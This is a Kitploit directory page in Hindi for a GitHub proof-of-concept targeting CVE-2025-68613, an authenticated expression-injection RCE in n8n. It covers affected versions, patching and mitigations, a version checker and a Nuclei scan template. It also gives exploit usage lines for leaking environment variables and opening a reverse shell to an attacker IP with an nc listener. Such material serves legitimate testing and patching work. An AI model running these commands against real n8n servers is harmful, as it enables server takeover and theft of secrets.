Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Blackash-CVE-2025-68613 — CVE-2025-68613 | Kitploit
उपकरण/GitHubGitHub/sahilccras/blackash-cve-2025-68613
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsahilccras/blackash-cve-2025-68613

Blackash-CVE-2025-68613

CVE-2025-68613

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-68613 — n8n में क्रिटिकल RCE

n8nblog

गंभीरता: 🔴 क्रिटिकल प्रभाव: रिमोट कोड एक्ज़ीक्यूशन प्रभावित प्लेटफ़ॉर्म: n8n (वर्कफ़्लो ऑटोमेशन)


🧩 अवलोकन

CVE-2025-68613, n8n में एक क्रिटिकल सुरक्षा कमज़ोरी है, जो एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है। यह समस्या एक प्रमाणित हमलावर को वर्कफ़्लो एक्सप्रेशन के मूल्यांकन का दुरुपयोग करके सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।


🎯 कमज़ोरी का विवरण

  • प्रकार: एक्सप्रेशन इंजेक्शन → रिमोट कोड एक्ज़ीक्यूशन
  • CWE: CWE-913 — डायनामिक रूप से प्रबंधित कोड संसाधनों का अनुचित नियंत्रण
  • हमला वेक्टर: नेटवर्क
  • आवश्यक विशेषाधिकार: निम्न (प्रमाणित उपयोगकर्ता)
  • उपयोगकर्ता इंटरैक्शन: कोई नहीं
  • दायरा: बदला हुआ

💥 यह खतरनाक क्यों है: दुर्भावनापूर्ण एक्सप्रेशन का मूल्यांकन एक ऐसे संदर्भ में किया जाता है जो ठीक से सैंडबॉक्स नहीं किया गया है, जिससे अंतर्निहित रनटाइम तक पहुंच मिलती है।


🧨 संभावित प्रभाव

G8vg8GbXkAAJan2

यदि शोषण किया जाता है, तो एक हमलावर यह कर सकता है:

  • 🖥️ मनमाने सिस्टम कमांड निष्पादित कर सकता है
  • 🔐 क्रेडेंशियल्स, टोकन और रहस्य चुरा सकता है
  • 🧬 वर्कफ़्लो को संशोधित या बैकडोर कर सकता है
  • 📤 संवेदनशील डेटा बाहर निकाल सकता है
  • 💣 n8n होस्ट से पूरी तरह समझौता कर सकता है

हमला n8n सेवा के समान विशेषाधिकारों के साथ चलता है, जिससे इसका प्रभाव बढ़ जाता है।


📊 गंभीरता मीट्रिक्स

मीट्रिकमान
CVSS v3.1~9.9–10.0
गोपनीयताउच्च
अखंडताउच्च
उपलब्धताउच्च

➡️ प्रमाणीकरण आवश्यक है, लेकिन कोई व्यवस्थापक पहुंच की आवश्यकता नहीं है।


🧪 प्रभावित संस्करण

🚫 कमज़ोर:

  • 0.211.0 → 1.120.3
  • 1.121.0

✅ पैच किए गए:

  • 1.120.4
  • 1.121.1
  • 1.122.0 और नए

🛠️ उपचार और शमन

✅ अनुशंसित (सर्वोत्तम विकल्प)

  • तुरंत एक फिक्स्ड संस्करण में अपग्रेड करें

⚠️ अस्थायी जोखिम न्यूनीकरण

(कमज़ोरी को पूरी तरह से नहीं हटाता)

  • वर्कफ़्लो निर्माण/संपादन को केवल विश्वसनीय उपयोगकर्ताओं तक सीमित करें
  • n8n को न्यूनतम OS विशेषाधिकारों के साथ चलाएं
  • सेवा को अलग करें (कंटेनर, VM, प्रतिबंधित फ़ाइल सिस्टम)
  • नेटवर्क एक्सपोज़र सीमित करें (VPN, फ़ायरवॉल नियम)
  • लॉगिंग सक्षम करें और वर्कफ़्लो परिवर्तनों की निगरानी करें

🧠 त्वरित संदर्भ



✅ CVE-2025-68613.py — रिमोट संस्करण और एक्सपोज़र जाँचकर्ता (सुरक्षित)

🧪 उदाहरण उपयोग

root@kitploit:~
sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678

उदाहरण आउटपुट

root@kitploit:~
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

मैं इस स्क्रिप्ट को कैसे चलाऊं?

  1. Nuclei डाउनलोड और इंस्टॉल करें।
  2. इस रिपॉजिटरी को अपने स्थानीय सिस्टम पर क्लोन करें।
  3. निम्नलिखित कमांड चलाएं:
root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678

या यदि आप होस्ट की सूची को स्कैन करना चाहते हैं, तो निष्पादित करें:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt

उदाहरण आउटपुट

nuclei

उपयोग उदाहरण:

  • पर्यावरण चर लीक करें:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak

  • उपयोगकर्ता जानकारी प्राप्त करें:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id

  • रिवर्स शेल (पहले लिसनर शुरू करें: nc -lvnp 4444):
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444

यह स्क्रिप्ट केवल अधिकृत सुरक्षा परीक्षण के लिए है, उन सिस्टमों पर जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है।


⚠️ अस्वीकरण ⚠️

🔒 यह स्क्रिप्ट n8n में CVE-2025-68613 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है।

📚 यह केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान की जाती है।

🛡️ इसका उपयोग विशेष रूप से उन सिस्टमों पर करें जिनके आप मालिक हैं, नियंत्रित करते हैं, या जिनके परीक्षण की स्पष्ट लिखित अनुमति है।

🚫 किसी भी सिस्टम के खिलाफ अनधिकृत उपयोग गैरकानूनी है और कानूनों का उल्लंघन हो सकता है (जैसे, कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम)।

❌ लेखक और कोई भी संबद्ध पक्ष दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई देयता नहीं मानते हैं।

✅ जिम्मेदारी से, नैतिक रूप से, और सभी लागू कानूनों और विनियमों के पूर्ण अनुपालन में उपयोग करें।

🔐 यदि पेनिट्रेशन टेस्टिंग कर रहे हैं, तो सुनिश्चित करें कि उचित प्राधिकरण (जैसे, एंगेजमेंट के नियम) मौजूद हैं।

🛠️ सुरक्षा शोधकर्ता इसका उपयोग कमज़ोरियों को सत्यापित करने और समय पर पैचिंग को प्रोत्साहित करने के लिए कर सकते हैं।


टूल डाउनलोड करें
श्रेणीजानकारी
CVE IDCVE-2025-68613
उत्पादn8n
बग वर्गएक्सप्रेशन इंजेक्शन
परिणामरिमोट कोड एक्ज़ीक्यूशन
आवश्यक पहुंचप्रमाणित उपयोगकर्ता
फिक्स उपलब्धहाँ